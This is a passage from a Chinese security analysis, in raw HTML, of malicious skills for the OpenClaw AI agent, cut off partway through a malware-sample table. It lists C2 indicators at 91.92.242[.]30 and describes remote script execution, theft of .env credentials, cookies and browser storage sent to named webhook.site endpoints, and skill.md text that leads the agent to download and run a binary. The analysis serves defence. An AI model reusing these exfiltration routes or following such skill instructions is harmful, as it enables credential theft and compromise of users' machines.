YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">    经归并分析，多个技能指向同一外部基础设施，仅路径参数不同，呈现明显批量同构投放特征：</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-bottom: 0px;margin-top: 0px;line-height: 1.6em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">目标路径族 A</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">：</span><span textstyle="" style="font-size: 14px;"><a href="http://91.92.242" target="_blank">http://91.92.242</a></span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">[</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">.</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">]</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">30/lamq4uerkruo6ssm agent-browser-6aigix9qi2tu</span></span></span></p></li><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="margin-bottom: 0px;margin-top: 0px;line-height: 1.6em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">auto-updater-ah1</span></span></span></p></li><li><p style="margin-bottom: 0px;margin-top: 0px;line-height: 1.6em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">deep-research-eoo5vd95</span></span></span></p></li></ul></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-bottom: 0px;margin-top: 0px;line-height: 1.6em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">目标路径族 B</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">：</span><span textstyle="" style="font-size: 14px;"><a href="http://91.92.242" target="_blank">http://91.92.242</a></span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">[</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">.</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">]</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">30/q0c7ew2ro8l2cfqp browser-agent-1kv</span></span></span></p></li><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="margin-bottom: 0px;margin-top: 0px;line-height: 1.6em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">clawbhub</span></span></span></p></li><li><p style="margin-bottom: 0px;margin-top: 0px;line-height: 1.6em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">twitter-sum</span></span></span></p></li></ul></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-bottom: 0px;margin-top: 0px;line-height: 1.6em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">目标路径族 C</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">：</span><span textstyle="" style="font-size: 14px;"><a href="http://91.92.242" target="_blank">http://91.92.242</a></span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">[</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">.</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">[</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">30/6x8c0trkp4l9uugo base-agent</span></span></span></p></li><ul class="list-paddingleft-1"><li><p style="line-height: 1.6em;margin-bottom: 0px;margin-top: 0px;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">bybit-agent</span></span></span></p></li><li><p style="line-height: 1.6em;margin-bottom: 8px;margin-top: 0px;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">base-agent</span></span></span></p></li></ul></ul><p style="text-align: center;margin-bottom: 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.10955961331901182" data-s="300,640" data-type="png" data-w="1862" style="width: 100%;" type="block" data-backw="578" data-backh="63" data-imgfileid="100027377" src="https://wechat2rss.xlab.app/img-proxy/?k=61ada7fb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXz5AnM1nZ6vIS6oJbFYTZWtibLlQQZiccetU3QtkUGRUczPQs2hCyakGwsr6SFqcf6zVIsSD5XcvtGnDscicZYHVKrNZFEycsSRE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h3 data-pm-slice="0 0 []"><span data-font-family="default"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;color: rgb(0, 82, 255);font-weight: bold;">2. 反弹shell</span></span></span></h3><p><span data-font-family="default"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 14px;">除混淆投递外，部分技能在运行时代码中直接嵌入远程执行逻辑:</span></span></span></p><p style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.26789366053169733" data-s="300,640" data-type="png" data-w="978" style="width:100%;" type="block" data-backw="578" data-backh="155" data-imgfileid="100027378" src="https://wechat2rss.xlab.app/img-proxy/?k=28fd134c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWmXkh9lnhxibL0MYFAmeryzQwJfX8vPFYrRjC5vsKmHNNERDLiboXDIz0DBCODSXeXibzBlv3aGfBvv3yialkA2rDSxS0rj3qewso%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;" data-pm-slice="0 0 []"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">风险定性：在技能运行阶段无提示拉取外部脚本并执行，具备完整远程代码执行能力，符合典型后门行为特征。</span></span></span></p></li></ul><h3><span data-font-family="default"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;color: rgb(0, 82, 255);font-weight: bold;">3. 数据外传与浏览器侧信息窃取</span></span></span></h3><p style="margin-top: 0px;margin-bottom: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">部分技能虽未直接关联已知 C2 或持久化逻辑，但具备明确的敏感数据外发能力:</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">本地凭据外传, 行为链路： 读取本地文件：~/.clawdbot/.env</span></span></p></li><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="margin-top: 0px;margin-bottom: 0px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">外发端点：<a href="https://webhook.site/358866c4-81c6-4c30-9c8c-358db4d04412" target="_blank">https://webhook.site/358866c4-81c6-4c30-9c8c-358db4d04412</a></span></span></p></li><li><p style="margin-top: 0px;margin-bottom: 0px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">通过 fetch() 以 POST 方式发送内容</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6425925925925926" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100027379" src="https://wechat2rss.xlab.app/img-proxy/?k=500f13a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwVBamicOjmXZPPzia61bxiaOzFQac5kRQ90y9ggYAS1LM7aibUngMCOHs48ja89GNnOewrG6pLo72bJWSJztJPlCicgCzzBWH3bYzYg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></li></ul></ul><p style="text-align:left;line-height:1.3;margin-top:3pt;margin-bottom:3pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">内嵌脚本外传浏览器数据, 行为链路： 读取浏览器侧数据：localStorage、sessionStorage、document.cookie、document.body.innerText</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align:left;line-height:1.3;margin-top:3pt;margin-bottom:3pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">外发端点：<a href="https://webhook.site/ace58e7f-0b19-4703-b754-4688a07a4f95" target="_blank">https://webhook.site/ace58e7f-0b19-4703-b754-4688a07a4f95</a></span></span></span></p></li></ul></ul><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7111111111111111" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100027380" src="https://wechat2rss.xlab.app/img-proxy/?k=36c1afdb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUnYn2DVTpVZBUt7AuP230wXpIjPfALAlib5le5uIOsmvaqZZRGib7ic7uYKl1f6RyqIuMGkcldooia6wW8ZBI04pGueUYfC5nHHfE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;" data-pm-slice="0 0 []"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;color: rgb(0, 82, 255);font-weight: bold;">4. 核心木马溯源</span></span></span></p><p style="margin-bottom: 0px;text-indent: 2em;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">如果用户安装了携带后门的Browser Agent，OpenClaw会根据skill.md的描述，base64解码后的url下载执行可执行文件，支持Windows系统及Macos系统：</span></span></span></p><p style="margin-bottom: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">样本基础信息</span></span></span></p><table style="border-collapse:collapse;border:none;table-layout:fixed;mso-table-layout-alt:fixed;width:542px;"><tbody><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-weight: bold;">属性</span></span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-weight: bold;">值</span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">文件名</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">dyrtvwjfveyxjf23</span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">MD5</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">760c89959e2d80f9b78a320023a875b7</span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">SHA256</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">30f97ae88f8861eeadeb54854d47078724e52e2ef36dd847180663b7f5763168</span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">文件类型</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">Mach-O universal binary (x86_64 + arm64)</span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">架构</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: 